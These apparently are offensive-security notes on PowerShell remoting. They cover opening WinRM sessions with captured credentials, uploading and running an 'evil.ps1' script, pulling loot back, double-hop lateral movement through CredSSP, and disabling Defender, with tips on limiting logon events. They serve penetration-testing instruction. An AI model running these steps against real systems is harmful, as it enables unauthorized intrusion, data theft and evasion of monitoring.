Check the language mode:
$ExecutionContext.SessionState.LanguageMode
Check the version:
$PSVersionTable.PSVersion
WinRM access is limited by default to members of the local Administrators and Remote Management Users groups. Whether a credential gets in is easily checked remotely by probing the target with CrackMapExec before committing to it. Once we have access, Invoke-Command runs remote commands:
Invoke-Command -ComputerName target -Credential $Credential -ScriptBlock {whoami}
We can also enter an SSH-like session with PowerShell:
Enter-PSSession -ComputerName target -Credential $Credential
Sessions can also be created in the background and stored in a variable for reuse:
$sess = New-PSSession -ComputerName target -Credential $Credential
Background sessions can be listed with:
Get-PSSession
Enter a PS Session with:
Enter-PSSession -id #
Leave an interactive session with:
Exit-PSSession
which returns to the local shell but leaves the session open on the target. Disconnect all background sessions with:
Get-PSSession | Disconnect-PSSession
Disconnected sessions keep running on the remote host and can be reattached with Connect-PSSession; to actually tear them down, pipe Get-PSSession into Remove-PSSession instead.
Copy-Item moves files over an existing session using -ToSession and -FromSession:
Copy-Item -ToSession $sess -Path "C:\Users\Administrator\Desktop\evil.ps1" -Destination "C:\Users\Administrator\Desktop\"
Copy-Item -FromSession $sess -Path "C:\Users\Administrator\Desktop\lootz\" -Destination "C:\Users\Administrator\Desktop\" -Recurse
The two cannot be combined: a single Copy-Item cannot copy from one session directly into another, so session-to-session transfers have to be staged through the local machine.
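The session workflow above as one end-to-end sequence, added here as an example (not part of the original notes): a single session is created once, reused for several commands with the -Session parameter, used for the file transfer in both directions, and then removed rather than merely disconnected. The hostname target, the $Credential variable and the file paths are assumptions for illustration.

```powershell
# Added example. Assumed: 'target' resolves, $Credential holds a PSCredential
# with WinRM access, .\evil.ps1 exists locally.
$sess = New-PSSession -ComputerName target -Credential $Credential

# Reuse one session for several commands instead of re-authenticating each time.
Invoke-Command -Session $sess -ScriptBlock { whoami; hostname }

# Push a script up, run it on the target, and pull its output back down.
Copy-Item -ToSession $sess -Path .\evil.ps1 -Destination 'C:\Users\Public\'
Invoke-Command -Session $sess -ScriptBlock {
    powershell -ExecutionPolicy Bypass -File 'C:\Users\Public\evil.ps1' |
        Out-File 'C:\Users\Public\out.txt'
}
New-Item -ItemType Directory -Path .\loot -Force | Out-Null
Copy-Item -FromSession $sess -Path 'C:\Users\Public\out.txt' -Destination .\loot\

# State persists inside a session between Invoke-Command calls.
Invoke-Command -Session $sess -ScriptBlock { $marker = 'set in an earlier call' }
Invoke-Command -Session $sess -ScriptBlock { $marker }

# Clean up on the target. Exit-PSSession and Disconnect-PSSession both leave
# the session alive remotely; Remove-PSSession tears it down.
Invoke-Command -Session $sess -ScriptBlock {
    Remove-Item 'C:\Users\Public\evil.ps1', 'C:\Users\Public\out.txt' -Force
}
Remove-PSSession -Session $sess
```

Reusing one session also keeps the number of logon events on the target down, which matters when the defenders are watching 4624/4648 volumes.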
We can use PS Remoting to execute commands on a secondary remote machine for lateral movement or moving deeper into a network.
Invoke-Command can be nested to execute a command on Computer A which in turn executes a command on Computer B.
However, the nested call often fails with what Microsoft calls the "double hop problem": the session on Computer A runs under a network logon that holds no reusable credentials, so it cannot authenticate onward to Computer B.
"...will fail because you are trying to make a remote operation from an environment which is already using a remote connection – this is known as the “double-hop” problem."
When a nested PSSession is needed, enable CredSSP to delegate credentials on to the next machine. Bear in mind that with CredSSP the first hop receives our plaintext credentials, so anyone who already controls Computer A can harvest them.
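The double hop in practice, as an added example (not from the original notes): the naive nested call, the lightweight fix of shipping the credential into the remote scope with $using:, and the CredSSP route the text describes. The hostnames hop1 and hop2 and the $cred variable are assumptions.

```powershell
# Added example. Assumed: hop1 and hop2 accept WinRM from the same domain account.
$cred = Get-Credential -Message 'Account with WinRM access to hop1 and hop2'

# 1. Naive nesting. The inner call runs on hop1 under a network logon with no
#    reusable credentials, so the second hop to hop2 fails with access denied.
Invoke-Command -ComputerName hop1 -Credential $cred -ScriptBlock {
    Invoke-Command -ComputerName hop2 -ScriptBlock { hostname }
}

# 2. No CredSSP needed: pass the credential object into the remote scope with
#    $using: and authenticate the second hop explicitly.
Invoke-Command -ComputerName hop1 -Credential $cred -ScriptBlock {
    Invoke-Command -ComputerName hop2 -Credential $using:cred -ScriptBlock { hostname }
}

# 3. CredSSP delegation. On the attacking machine, allow the client to delegate
#    credentials to hop1...
Enable-WSManCredSSP -Role Client -DelegateComputer hop1 -Force
#    ...and on hop1 itself, allow it to accept delegated credentials.
Invoke-Command -ComputerName hop1 -Credential $cred -ScriptBlock {
    Enable-WSManCredSSP -Role Server -Force
}
#    Now request CredSSP on the first hop; hop1 can reuse the credential for hop2.
Invoke-Command -ComputerName hop1 -Credential $cred -Authentication Credssp -ScriptBlock {
    Invoke-Command -ComputerName hop2 -ScriptBlock { hostname }
}

# hop1 now holds our plaintext credentials. Undo the client-side delegation
# when finished.
Disable-WSManCredSSP -Role Client
```

Option 2 is usually enough for a one-off nested command and leaves no configuration change behind; option 3 changes WinRM and local policy on both ends, which is both noisy and a credential-theft risk if hop1 is not trusted.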
On the machine that should accept connections, first enable remoting from an administrative PowerShell window:
Enable-PSRemoting -Force
Make sure WinRM starts automatically and confirm the service state:
Set-Service WinRM -StartupType Automatic
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}
On the client, trust all hosts (*) so we can connect by IP address instead of hostname. Connections by IP fall back from Kerberos to NTLM, and this setting disables server identity checking for them, so narrow it back down when done:
Set-Item WSMan:localhost\client\trustedhosts -value *
Get-Item WSMan:\localhost\Client\TrustedHosts
Check age of Defender's AV signatures:
Get-MpComputerStatus | Select AntivirusSignature*
Disable Defender's real-time monitoring (requires an elevated shell, and is blocked when Tamper Protection is enabled):
Set-MpPreference -DisableRealtimeMonitoring $true